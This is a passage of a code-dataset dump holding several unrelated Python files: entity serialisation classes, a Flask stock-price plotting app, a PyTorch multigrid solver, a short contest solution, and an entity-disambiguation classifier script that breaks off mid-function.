\"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['title'] = self.title\n if (self.customer != None):\n root['customer'] = self.customer\n if (self.payer != None):\n root['payer'] = self.payer\n if (self.subscriber != None):\n root['subscriber'] = self.subscriber\n\n return dumps(root)\n\n\nclass Address(object):\n \"\"\"Class Address\n \"\"\"\n\n def __init__(self, id, street, street_no, city, zip, roles={}):\n \"\"\"Class constructor\n\n Address role entity \n\n Args:\n id (int): address id \n street (str): street\n street_no (str): street number\n city (str): city\n zip (int): zip code\n roles (list): address 
roles\n\n \"\"\"\n\n self.id = id\n self.street = street\n self.street_no = street_no\n self.city = city\n self.zip = zip\n self.roles = roles\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|street:{1}|street_no:{2}|city:{3}'.format(self.id, self.street, self.street_no, self.city) + \\\n u'|zip:{0}|roles#'.format(self.zip)\n\n if (len(self.roles) > 0):\n\n for role in self.roles:\n s += '{0}#'.format(role)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes address to XML \n \"\"\"\n\n root = Element('address')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'street').text = self.street\n SubElement(root, 'street_no').text = self.street_no\n SubElement(root, 'city').text = self.city\n SubElement(root, 'zip').text = str(self.zip)\n\n if (len(self.roles) > 0):\n elem = SubElement(root, 'roles')\n\n for role in self.roles:\n elem.append(role.toxml())\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes address to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['street'] = self.street\n root['street_no'] = self.street_no\n root['city'] = self.city\n root['zip'] = self.zip\n\n if (len(self.roles) > 0):\n el_roles = []\n\n for role in self.roles:\n el_role = {'id': role.id, 'title': role.title,\n 'contact': role.contact, 'customer': role.customer,\n 'payer': role.payer, 'subscriber': role.subscriber}\n el_roles.append(el_role)\n\n root['roles'] = {'role': el_roles}\n\n return dumps(root)\n\n\nclass AddressRole(object):\n \"\"\"Class AddressRole\n \"\"\"\n\n def __init__(self, id, title, contact=None, customer=None, payer=None, subscriber=None):\n \"\"\"Class constructor\n\n Address role entity \n\n Args:\n id (int): address id \n title (str): role title, contract|contact|invoicing|delivery\n contact (int): assigned contact id\n customer (int): assigned customer id\n payer (int): assigned payer id\n subscriber (int): assigned subscriber id \n\n \"\"\"\n\n self.id = id\n self.title = title\n self.contact = contact\n self.customer = customer\n self.payer = payer\n self.subscriber = subscriber\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|title:{1}|contact:{2}|customer:{3}'.format(self.id, self.title, self.contact, self.customer) + \\\n u'|payer:{0}|subscriber:{1}'.format(self.payer, self.subscriber)\n return s\n\n def toxml(self):\n \"\"\"Method serializes address role to XML \n \"\"\"\n\n root = Element('role')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'title').text = self.title\n if (self.contact != None):\n SubElement(root, 'contact').text = str(self.contact)\n if (self.customer != None):\n SubElement(root, 'customer').text = str(self.customer)\n if (self.payer != None):\n SubElement(root, 'payer').text = str(self.payer)\n if (self.subscriber != None):\n SubElement(root, 'subscriber').text = str(self.subscriber)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes address role to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['title'] = self.title\n if (self.contact != None):\n root['contact'] = self.contact\n if (self.customer != None):\n root['customer'] = self.customer\n if (self.payer != None):\n root['payer'] = self.payer\n if (self.subscriber != None):\n root['subscriber'] = self.subscriber\n\n return dumps(root)\n\n\nclass Service(object):\n \"\"\"Class Service\n \"\"\"\n\n def __init__(self, id, name, status, params={}):\n \"\"\"Class constructor\n\n Service entity \n\n Args:\n id (int): service id \n name (str): name\n 
status (str): status, active|deactive|suspend\n params (dict): parameters\n\n \"\"\"\n\n self.id = id\n self.name = name\n self.status = status\n self.params = params\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|status:{2}|params#'.format(\n self.id, self.name, self.status)\n\n if (len(self.params) > 0):\n\n for key, value in self.params.items():\n s += '{0}:{1}#'.format(key, value)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes service to XML \n \"\"\"\n\n root = Element('service')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n SubElement(root, 'status').text = self.status\n\n elem = SubElement(root, 'params')\n for key, value in self.params.items():\n el_param = Element('entry')\n SubElement(el_param, 'key').text = str(key)\n SubElement(el_param, 'value').text = value\n elem.append(el_param)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes service to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n root['status'] = self.status\n\n el_params = []\n for key, value in self.params.items():\n param = {}\n param['key'] = key\n param['value'] = value\n el_params.append(param)\n\n root['params'] = {'entry': el_params}\n\n return dumps(root)\n\n\nclass ServiceOperation(object):\n \"\"\"Class ServiceOperation\n \"\"\"\n\n def __init__(self, service, customer=None, payer=None, subscriber=None, status=None, params={}):\n \"\"\"Class constructor\n\n Service operation entity \n\n Args:\n service (int): service id\n customer (int): assigned customer id\n payer (int): assigned payer id\n subscriber (int): assigned subscriber id\n status (str): service status, active|deactive|suspend\n params (dict): service parameters\n\n \"\"\"\n\n self.service = service\n self.customer = customer\n self.payer = payer\n self.subscriber = subscriber\n self.status = status\n self.params = params\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'service:{0}|customer:{1}|payer:{2}'.format(self.service, self.customer, self.payer) + \\\n u'|subscriber:{0}|status:{1}|params#'.format(\n self.subscriber, self.status)\n\n if (len(self.params) > 0):\n\n for key, value in self.params.items():\n s += '{0}:{1}#'.format(key, value)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes service operation to XML \n \"\"\"\n\n root = Element('operation')\n\n SubElement(root, 'service').text = str(self.service)\n if (self.customer != None):\n SubElement(root, 'customer').text = str(self.customer)\n if (self.payer != None):\n SubElement(root, 'payer').text = str(self.payer)\n if (self.subscriber != None):\n SubElement(root, 'subscriber').text = str(self.subscriber)\n if (self.status != None):\n SubElement(root, 'status').text = self.status\n\n elParams = SubElement(root, 'params')\n\n for key, value in self.params.items():\n elParam = SubElement(elParams, 'entry')\n elem = SubElement(elParam, 'key')\n elem.text = str(key)\n elem = SubElement(elParam, 'value')\n elem.text = str(value)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes service operation to JSON \n \"\"\"\n\n root = {}\n\n root['service'] = self.service\n if (self.customer != None):\n root['customer'] = self.customer\n if (self.payer != None):\n root['payer'] = self.payer\n if (self.subscriber != None):\n root['subscriber'] = self.subscriber\n if (self.status != None):\n root['status'] = self.status\n\n el_params = []\n for key, value in self.params.items():\n param = {}\n 
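# Each parameter becomes a {'key': ..., 'value': ...} entry, e.g.\n            # {'params': {'entry': [{'key': 'name', 'value': 'test'}]}} (values\n            # here are illustrative), mirroring the <entry> elements that\n            # toxml() produces for the same data.\n            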
param['key'] = key\n            param['value'] = value\n            el_params.append(param)\n\n        root['params'] = {'entry': el_params}\n\n        return dumps(root)\n","repo_name":"hydratk/hydratk-ext-testenv","sub_path":"src/hydratk/extensions/testenv/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":19899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
+{"seq_id":"43381319481","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas_datareader import data as web\nimport plotly\nimport plotly.plotly as plty\nimport plotly.graph_objs as go\nimport io\nimport base64\n\n\n# In[2]:\n\n\n# creates the flask app\nfrom flask import Flask\napp = Flask(__name__)\n\n\n# In[3]:\n\n\ndef get_adj_close(ticker, start, end):\n\n    start = start\n    end = end\n    info = web.DataReader(ticker, data_source='yahoo', start=start, end=end)['Adj Close']\n    return pd.DataFrame(info)\n\n\n# In[4]:\n\n\n#ticker = 'msft'\n\n\n# In[5]:\n\n\n#tick1 = get_adj_close(ticker, '1/2/2017', '26/10/2018')\n\n\n# In[6]:\n\n\ndef stockplot(ticker):\n    img = io.BytesIO()\n    tick1 = get_adj_close(ticker, '1/2/2017', '26/10/2018')\n    tick1[['Adj Close']].plot(figsize=(12,6))\n    plt.title('Price History')\n    plt.ylabel('Price (USD)')\n    plt.savefig(img, format='png')\n    img.seek(0)\n    plot_url = base64.b64encode(img.getvalue()).decode()\n    return '<img src=\"data:image/png;base64,{}\">'.format(plot_url)\n\n# reference https://ntguardian.wordpress.com/2016/09/19/introduction-stock-market-data-python-1/\n\n\n# In[7]:\n\n\n# obtain ticker data for the set time period from yahoo\n@app.route(\"/stocks/<name>/\")\ndef getStock(name):\n    return stockplot(name)\n\n\n\n# In[8]:\n\n\n# #from Gordon's example to return output\n\n# @app.route('/query-example')\n# def query_example():\n#     language = request.args.get('language') #if key doesn't exist, returns None\n#     # language = language.lower()\n#     framework = request.args.get('framework')\n#     ticker = request.args['ticker'] #if key doesn't exist, returns a 400, bad request error \n#     return '''<h1>The language value is: {}</h1>\n#               <h1>The framework value is: {}</h1>\n#               <h1>The ticker value is: {}'''.format(language, framework,ticker)\n\n\n# In[9]:\n\n\n# # run the flask app on port 9000 on the localhost\n# if __name__ == \"__main__\":\n#     app.run('localhost', 9000, app)\n\n\n# In[ ]:\n\n\nif __name__ == \"__main__\":\n    app.run(host = '0.0.0.0', port=9000)\n\n\n# In[ ]:\n\n\n# References\n# https://scotch.io/bar-talk/processing-incoming-request-data-in-flask\n\n","repo_name":"tuggawaugh/Harshil595","sub_path":"FE595midtermBP.py","file_name":"FE595midtermBP.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"36585661296","text":"\"\"\"\nPython/PyTorch implementation of a geometric multigrid (MG) solver for elliptic\nequations, such as Poisson and Helmholtz-like equations\nEquations are of the form : Δu - λu = f\n\"\"\"\n\nfrom smoothers import choose_smoother, residual, residualN\nfrom scaling import choose_restriction, choose_interpolation\nimport torch\n\nclass MG():\n    \"\"\"Multigrid solver for Laplace / Helmholtz like equations :\n    Δu - λu = f with homogeneous Dirichlet/Neumann boundary conditions\n    Currently supported grid types and boundary conditions combinations are :\n    - Dirichlet : the grid is vertex-centered and must be odd-sized.\n    - Neumann : the grid is cell-centered and must be even-sized.\n    \"\"\"\n\n    def __init__(self, *, dx, dy, nx, ny, nl, nlevels, grid_type, boundary_cond,\n                 lambd=0.,\n                 tol=1e-4,\n                 max_ite=15,\n                 presmoother=('gauss_seidel_rb', {'omega':1.2, 'iters':2}),\n                 postsmoother=('gauss_seidel_rb', {'omega':1.2, 'iters':2}),\n                 restriction=None,\n                 interpolation='bilinear',\n                 dtype=torch.float64,\n                 device='cpu',\n                 compiled=True):\n        \"\"\"\n        Parameters :\n        ------------\n        dx, dy : float\n            Initial mesh size\n        nx, ny : int\n            Initial grid size\n        nl : int\n            Number of layers (stacked upon first dimension of tensor)\n        nlevels :\n            Depth of multigrid cycle (i.e. number of restrictions/interpolations)\n        grid_type : {'vertex-centered', 'cell-centered'}\n        lambd : float or torch.Tensor\n            λ parameter in Helmholtz equation. 
λ=0 for Poisson equations.\n In case of a multi-layer grid, λ can be a tensor of each λ for each grid.\n tol : float\n Tolerance for stopping criteria in FMG cycle\n max_ite : int\n Maximum number of V-cycles to perform at the end of FMG cycle if\n tolerance is not reached\n presmoother : (string, dict)\n Describe the presmoother used in first half of the multigrid cycle.\n Must be of the form : ('smoother_name', {'omega':omega, 'iters':iters})\n Currently only 'jacobi' and 'gauss_seidel_rb' are supported.\n postsmoother : (string, dict)\n Same as for presmoother, used in the second half of the multigrid cycle.\n restriction : {'HW', 'FW', 'bilinear'}\n Transfer operator used for restriction.\n interpolation : {'bilinear'}\n Transfer operator used for restriction.\n dtype : torch.dtype\n Type used for torch tensors\n device : {'cpu', 'cuda'}\n Device on which are performed calculations\n compiled : bool\n Choose whether to compile using torch.jit.trace or not.\n \"\"\"\n\n self.dtype = dtype\n self.device = device\n\n # Grid parameters\n self.nx = nx\n self.ny = ny\n self.nl = nl\n self.dx = torch.full((), dx, dtype=self.dtype, device=self.device)\n self.dy = torch.full((), dy, dtype=self.dtype, device=self.device)\n\n self.lambd = lambd if isinstance(lambd, torch.Tensor) else torch.full((), lambd, dtype=self.dtype, device=self.device)\n\n assert boundary_cond in ['dirichlet', 'neumann'], \"Boundary condition must be 'dirichlet' or 'neumann'\"\n\n self.nlevels = nlevels\n self.max_ite = max_ite\n self.tol = tol\n\n self.ns = 15 # Number of bottom smoothing (exact solution)\n\n self.shape = (self.nl, self.nx, self.ny) # if self.nlevels > 1 else (self.nx, self.ny)\n if boundary_cond=='dirichlet' :\n assert self.nx%2**self.nlevels==1 and self.ny%2**self.nlevels==1, f\"Grid size {(self.nx, self.ny)} incorrect\"\n if boundary_cond=='neumann':\n assert self.nx%2**self.nlevels==0 and self.ny%2**self.nlevels==0, f\"Grid size {(self.nx, self.ny)} incorrect\"\n\n print(f'PyTorch multigrid solver, {self.device}, {self.dtype}')\n\n v = torch.zeros(self.shape, dtype=self.dtype, device=self.device)\n\n # Setup smoothers\n smoother, param = presmoother\n presmoother = choose_smoother(smoother, boundary_cond)\n self.presmooth = lambda u, f, dx, dy : presmoother(u, f, dx, dy,\n lambd=self.lambd, omega=param['omega'], iters=param['iters'])\n if compiled : self.presmooth = torch.jit.trace(self.presmooth, (v, v, self.dx, self.dy))\n\n smoother, param = postsmoother\n postsmoother = choose_smoother(smoother, boundary_cond)\n self.postsmooth = lambda u, f, dx, dy : postsmoother(u, f, dx, dy,\n lambd=self.lambd, omega=param['omega'], iters=param['iters'])\n if compiled : self.postsmooth = torch.jit.trace(self.postsmooth, (v, v, self.dx, self.dy))\n\n # Setup transfer operators\n default_restriction = {'dirichlet' : 'FW', 'neumann' : 'four_average'}\n if not restriction : restriction = default_restriction[boundary_cond]\n self.restrict = choose_restriction(restriction, boundary_cond)\n self.interpolate = choose_interpolation(interpolation, boundary_cond)\n if compiled : self.restrict = torch.jit.trace(self.restrict, (v,))\n if compiled : self.interpolate = torch.jit.trace(self.interpolate, (v,))\n\n # Setup residual\n res = residual if boundary_cond=='dirichlet' else residualN\n self.residual = lambda u, f, dx, dy : res(u, f, dx, dy, self.lambd)\n if compiled : self.residual = torch.jit.trace(self.residual, (v, v, self.dx, self.dy))\n\n print('Initialization completed')\n\n def solve(self, f):\n return 
self.FMG(f, self.dx, self.dy)\n\n def Two_cycles(self, u, f, dx, dy):\n\n #Step 1: Relax Au=f on this grid\n u = self.presmooth(u ,f, dx, dy)\n res = self.residual(u, f, dx, dy)\n\n #Step 2: Restrict residual to coarse grid\n res_c = self.restrict(res)\n\n #Step 3:Solve A e_c=res_c on the coarse grid\n e_c = torch.zeros_like(res_c)\n e_c = self.presmooth(e_c, res_c, dx*2, dy*2)\n\n #Step 4: Interpolate(prolong) e_c to fine grid and add to u\n u += self.interpolate(e_c)\n\n #Step 5: Relax Au=f on this grid\n u = self.postsmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n return u, res\n\n\n def V_cycle(self, num_levels, u, f, dx, dy, level=1):\n\n if(level==num_levels): #bottom solve\n for _ in range(self.ns):\n u = self.presmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n return u,res\n\n # Step 1: Relax Au=f on this grid\n u = self.presmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n\n # Step 2: Restrict residual to coarse grid\n res_c = self.restrict(res)\n\n # Step 3:Solve A e_c=res_c on the coarse grid. (Recursively)\n e_c = torch.zeros_like(res_c)\n e_c, res_c = self.V_cycle(num_levels, e_c, res_c, dx*2, dy*2, level=level+1)\n\n # Step 4: Interpolate(prolong) e_c to fine grid and add to u\n u += self.interpolate(e_c)\n\n # Step 5: Relax Au=f on this grid\n u = self.postsmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n\n return u, res\n\n def FMG(self, f, dx, dy, level=1):\n \"\"\"Full Multigrid cycle\"\"\"\n\n if(level==self.nlevels):#bottom solve\n u = torch.zeros_like(f)\n for _ in range(self.ns):\n u = self.presmooth(u, f, dx, dy)\n res = self.residual(u, f, dx, dy)\n return u, res\n\n # Step 1: Restrict the rhs to a coarse grid\n f_c = self.restrict(f)\n\n # Step 2: Solve the coarse grid problem using FMG\n u_c, _ = self.FMG(f_c, dx*2, dy*2, level+1)\n\n # Step 3: Interpolate u_c to the fine grid\n u = self.interpolate(u_c)\n\n # Step 4: Execute 'nv' V-cycles\n # for _ in range(self.nv):\n # u, res = self.V_cycle(self.nlevels-level, u, f, dx, dy)\n\n u, res = self.V_cycle(self.nlevels-level, u, f, dx, dy)\n\n if level < 2:\n nres = res.norm()/f.norm()\n nite = 0\n while nite < self.max_ite and nres > self.tol:\n u, res = self.V_cycle(self.nlevels-level, u, f, dx, dy)\n nres = res.norm()/f.norm()\n nite += 1\n\n return u, res\n","repo_name":"gauvain-thomas/Geometric-Multigrid","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18255285641","text":"#!/usr/bin/env pypy3\n# -*- coding: UTF-8 -*-\n\nn,k=map(int,input().split())\nk=240-k\nans=0\nchk=1\nwhile (k-chk*5>=0):\n ans+=1\n k-=chk*5\n chk+=1\nprint(min(ans,n))\n","repo_name":"clarinet758/codeforces","sub_path":"etc/GoodBye/GoodBye2016/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12772328580","text":"# -*- coding: utf-8 -*-\nimport sys\nimport re\nimport copy\nimport csv\nimport random\nimport glob\nimport fileinput\nimport cPickle as pickle\nimport pyley\nimport pylru\nfrom sklearn.linear_model import SGDClassifier\nfrom select_aliases import uppercase_first_letters\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ncsv.field_size_limit(sys.maxsize)\n\nCOLUMNS = 5000\n\nMATRIX_KEY = \"M_%s\"\nVECTOR_KEY = \"V_%s_EPOCH_%d\"\nCLASSIFIER_KEY = \"C_%s_EPOCH_%d\"\nSAMPLE_KEY = \"S_%s_EPOCH_%d\"\nFILE_PATTERN = 
\"/data/pickles/{key}__{version}.pickle\"\n\n\ndef format_alias(alias):\n # Filter numbers.\n if len(alias.split()) == 1:\n try:\n float(alias)\n return None\n except ValueError:\n pass\n\n # uppercase first letters and return.\n return uppercase_first_letters(alias)\n\n\nclass Graph(object):\n client = pyley.CayleyClient()\n graph = pyley.GraphObject()\n\n cache = pylru.lrucache(100) # LRU cache.\n\n NAME = \"http://www.w3.org/2000/01/rdf-schema#label\"\n ALIAS = \"http://rdf.basekb.com/ns/common.topic.alias\"\n ALIAS_PATTERN = \"\\\"%s\\\"@en\"\n TYPE = \"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"\n # TYPE_PATTERN = \"http://rdf.basekb.com/ns/%s\"\n\n def get_entities(self, alias):\n \"\"\"\n Return the list of entity ids with given alias.\n \"\"\"\n # Hit the cache first.\n try:\n r = self.cache[alias]\n return r\n except KeyError:\n pass\n\n entities = []\n name = self.ALIAS_PATTERN % alias\n ## Query the graph:\n # Look for entities with name == alias\n q1 = self.graph.V().Has(self.NAME, name).All()\n response1 = self.client.Send(q1)\n # Look for entities with alias == alias\n q2 = self.graph.V().Has(self.ALIAS, name).All()\n response2 = self.client.Send(q2)\n\n ## Merge both responses to get the list of entities.\n seen_entities = set()\n if response1.result.get('result'):\n l1 = response1.result.get('result')\n for el in l1:\n e = el.get('id')\n if e not in seen_entities:\n entities.append(e)\n seen_entities.add(e)\n if response2.result.get('result'):\n l2 = response2.result.get('result')\n for el in l2:\n e = el.get('id')\n if e not in seen_entities:\n entities.append(e)\n seen_entities.add(e)\n\n # Cache results.\n self.cache[alias] = copy.copy(entities)\n\n return entities\n\n def get_types(self, entity):\n # Check for cached value.\n try:\n cached_result = self.cache[entity]\n return cached_result\n except KeyError:\n pass\n\n t = []\n q = self.graph.V(entity).Out(self.TYPE).All()\n response = self.client.Send(q)\n res = response.result.get('result')\n if not res:\n self.cache[entity] = [] # Update cache.\n return []\n seen_types = set()\n for el in res:\n e = el.get('id')\n if e not in seen_types:\n t.append(e)\n seen_types.add(e)\n\n self.cache[entity] = copy.copy(t) # Update cache.\n return t\n\n def get_all_types(self, entities):\n \"\"\"\n For each entities, return the list of unique types.\n e.g:\n [\"entity_1\", \"entity_2\"] -> [[\"type_b\", \"type_a\"], [\"type_c\", \"type_a\"]]\n \"\"\"\n types = []\n for entity in entities:\n types.append(self.get_types(entity))\n return types\n\n\nclass Loader(object):\n\n graph = Graph()\n X_STORE = {}\n Y_STORE = {}\n\n def load_data(self):\n \"\"\"\n Load data to pickle files.\n \"\"\"\n row_number = 0\n previous_alias = \"\"\n\n for row in csv.reader(sys.stdin):\n row_number += 1\n if row_number < 850000:\n continue\n if row_number % 100 == 0:\n sys.stderr.write(\"Row %d...\\n\" % row_number)\n alias = format_alias(row[2])\n if not alias:\n continue\n x = []\n # Fill vector x.\n for i in xrange(COLUMNS):\n if i < 3:\n continue\n x.append(int(row[i]))\n\n if alias != previous_alias:\n # Save previous values to disk.\n self.save_to_disk()\n previous_alias = alias\n\n entities = self.graph.get_entities(alias)\n types = self.graph.get_types(entities)\n\n idx = random.randint(0, len(entities)) # Assign random entity.\n i = -1\n for entity in entities:\n entity_id = entity.split('/')[-1]\n i += 1\n # Assign alias to one of the entities.\n y = 0\n if i == idx:\n y = 1\n\n # Update entities.\n self.update(entity_id, x, y)\n\n # 
Update types.\n if not types:\n continue\n for t in types[i]:\n type_id = t.split('/')[-1]\n self.update(type_id, x, y)\n\n def update(self, uid, x, y):\n X_key = MATRIX_KEY % uid\n Y_key = VECTOR_KEY % (uid, 0) # Epoch 0.\n\n # Get previous X and Y\n X = self.X_STORE.get(X_key) or []\n Y = self.Y_STORE.get(Y_key) or []\n\n # Append new values.\n X.append(x)\n Y.append(y)\n\n # Store X and Y back.\n self.X_STORE[X_key] = X\n self.Y_STORE[Y_key] = Y\n\n def save_to_disk(self):\n # Save X and Y to disk.\n for STORE in [self.X_STORE, self.Y_STORE]:\n for key, X in STORE.iteritems():\n filepattern = FILE_PATTERN.format(key=key, version=\"*\")\n\n files = glob.glob(filepattern)\n version = len(files) + 1\n filepath = FILE_PATTERN.format(\n key=key,\n version=str(version),\n )\n\n with open(filepath, 'w') as f:\n # override previous pickle\n pickle.dump(X, f, -1)\n\n # Clear X and Y stores.\n self.X_STORE = {}\n self.Y_STORE = {}\n\n\nclass Classifier(object):\n\n graph = Graph()\n\n Y_STORE = {}\n\n entity_id_regexp = re.compile(r'^.+/([^>]+)>?$')\n entity_regexp = re.compile(r'^]+/[^<>]+)>?$')\n\n MAX_SAMPLES = 50000\n\n PROBABILITY_THRESHOLD = 0.0\n\n def __init__(self, epoch=0, alpha=0.1):\n self.epoch = epoch\n self.alpha = alpha # Weight of the sum of P(y|t), for t € T(e).\n\n def train(self):\n # Read ENTITIES.txt or TYPES.txt from stdin.\n l = 0\n for line in fileinput.input():\n l += 1\n\n # if l < 14912:\n # continue\n\n entity_id = self.entity_id_regexp.match(line).group(1)\n entity = self.entity_regexp.match(line).group(1)\n\n sys.stderr.write(\"%d - Handling %s\\n\" % (l, entity))\n\n # Get vector and matrix.\n Xall, yall = self.merge_files(entity_id, self.epoch)\n\n if not yall or len(yall) < 100:\n # Not enough data.\n sys.stderr.write(\"Ignoring %s (%d)\\n\" % (entity, len(yall)))\n continue\n\n sys.stderr.write(\"Length: %d\\n\" % len(yall))\n\n # Fit entity.\n self.classify(entity_id, Xall, yall, self.epoch)\n\n def merge_files(self, entity_id):\n \"\"\"\n Merge pickle files together to re-generate X and y.\n \"\"\"\n Xall = self.get_X(entity_id)\n yall = self.get_y(entity_id)\n\n return Xall, yall\n\n def balance_dataset(self, Xall, yall, key):\n \"\"\"\n Split the dataset in two parts and balance one of the part\n between valid and invalid elements.\n \"\"\"\n l = len(yall)\n\n # Select 2/3 of the indexes randomly.\n nb_samples = 2 * (l/3)\n sample = set(random.sample(xrange(l), nb_samples))\n\n # # store sampling.\n # k = SAMPLE_KEY % (key, self.epoch)\n # filepath = FILE_PATTERN.format(\n # key=k,\n # version=\"\", # Whatever\n # )\n # with open(filepath, 'w') as f:\n # pickle.dump(sample, f, -1)\n\n # Count the number of valid instances.\n valid_idx = []\n invalid_idx = []\n idx = -1\n for instance in yall:\n idx += 1\n if idx not in sample:\n continue\n if instance == 0:\n # invalid\n invalid_idx.append(idx)\n else:\n # valid\n valid_idx.append(idx)\n\n if len(valid_idx) == 0 or len(invalid_idx) == 0:\n sys.stderr.write(\"Only one class labels!\")\n return [], []\n\n s = set()\n ms = self.MAX_SAMPLES / 2\n if len(valid_idx) < len(invalid_idx):\n m = len(valid_idx) if len(valid_idx) <= ms else ms\n v = valid_idx\n if len(valid_idx) > ms:\n v = random.sample(valid_idx, m)\n li = random.sample(invalid_idx, m) + v\n s = set(li)\n else:\n m = len(invalid_idx) if len(invalid_idx) <= ms else ms\n v = invalid_idx\n if len(invalid_idx) > ms:\n v = random.sample(invalid_idx, m)\n li = random.sample(valid_idx, m) + v\n s = set(li)\n\n X, y = [], []\n idx = -1\n for instance in 
yall:\n idx += 1\n if idx not in sample:\n continue\n\n if idx in s:\n X.append(Xall[idx])\n y.append(yall[idx])\n return X, y\n\n def classify(self, entity_id, Xall, yall):\n # Balance the dataset.\n X, y = self.balance_dataset(Xall, yall, entity_id, self.epoch)\n\n if not y:\n return\n\n sys.stderr.write(\"After balancing: %d\\n\" % len(y))\n\n # Fit the classifier.\n clf = SGDClassifier(loss=\"log\", shuffle=True).fit(X, y)\n\n # Store the classifier.\n c_key = CLASSIFIER_KEY % (entity_id, self.epoch)\n c_file = FILE_PATTERN.format(key=c_key, version=\"\")\n with open(c_file, 'w') as f:\n pickle.dump(clf, f, -1)\n\n def assign(self, alias, f):\n \"\"\"\n Given an alias and a bag-of-words vector, assign an entity.\n Return the id bag-of-words the selected entity or None.\n \"\"\"\n # get entities\n entities = self.graph.get_entities(alias)\n\n if len(entities) == 1:\n # Naturally disambiguated alias.\n return entities[0], 1.0\n\n elif not entities:\n return None, .0\n\n # get all types\n all_types = self.graph.get_all_types(entities)\n\n probabilities = {}\n\n idx = -1\n for entity in entities:\n entity_id = entity.split('/')[-1]\n idx += 1\n\n clf = None\n c_key = CLASSIFIER_KEY % (entity_id, self.epoch)\n c_file = FILE_PATTERN.format(key=c_key, version=\"\")\n try:\n with open(c_file, 'r') as fi:\n clf = pickle.load(fi)\n except IOError:\n return None, .0\n\n p = 0\n if clf is not None:\n i = 0 if clf.classes_[0] == 1 else 1\n p = clf.predict_proba(f)[0][i]\n\n types = all_types[idx]\n for t in types:\n clf_t = None\n type_id = t.split('/')[-1]\n c_key = CLASSIFIER_KEY % (type_id, self.epoch)\n c_file = FILE_PATTERN.format(key=c_key, version=\"\")\n try:\n with open(c_file, 'r') as fi:\n clf_t = pickle.load(fi)\n except IOError:\n pass\n\n if clf_t is not None:\n i = 0 if clf_t.classes_[0] == 1 else 1\n p += self.alpha * clf_t.predict_proba(f)[0][i]\n\n probabilities[entity] = p\n\n # Assign entity!\n max_proba = 0\n selected_entity = None\n for k, v in probabilities.iteritems():\n if v > max_proba:\n max_proba = v\n selected_entity = k\n\n if max_proba > self.PROBABILITY_THRESHOLD:\n # if max_proba > 0:\n return selected_entity, max_proba\n else:\n return None, .0\n\n def assign_all(self):\n writer = csv.writer(sys.stdout)\n row_number = 0\n assignment_nb = 0\n #previous_alias = \"\"\n for row in csv.reader(sys.stdin):\n row_number += 1\n if row_number % 1000 == 0:\n sys.stderr.write(\"Row %d...\\n\" % row_number)\n\n if row_number < 780433:\n continue\n\n alias = format_alias(row[2])\n if not alias:\n continue\n x = []\n # Fill vector x.\n for i in xrange(COLUMNS):\n if i < 3:\n continue\n x.append(int(row[i]))\n\n # if alias != previous_alias:\n # # Save previous values to disk.\n # self.save_to_disk()\n # previous_alias = alias\n\n # Assign entity.\n entity, p = self.assign(alias, x)\n\n if entity:\n assignment_nb += 1\n sys.stderr.write(\"Assignment %d / %d (Proba: %f)\\n\" % (\n assignment_nb, row_number, p))\n writer.writerow([row[0], row[1], alias, entity, p])\n\n # # get entities\n # entities = self.graph.get_entities(alias)\n # # get all types\n # all_types = self.graph.get_all_types(entities)\n\n # if not entity:\n # self.update_unchanged(entities, all_types, row_number)\n # else:\n # self.update(entity, entities, all_types, row_number)\n\n def save_to_disk(self):\n # Save X and Y to disk.\n for key, y in self.Y_STORE.iteritems():\n filepattern = FILE_PATTERN.format(key=key, version=\"*\")\n\n files = glob.glob(filepattern)\n version = len(files) + 1\n filepath = 
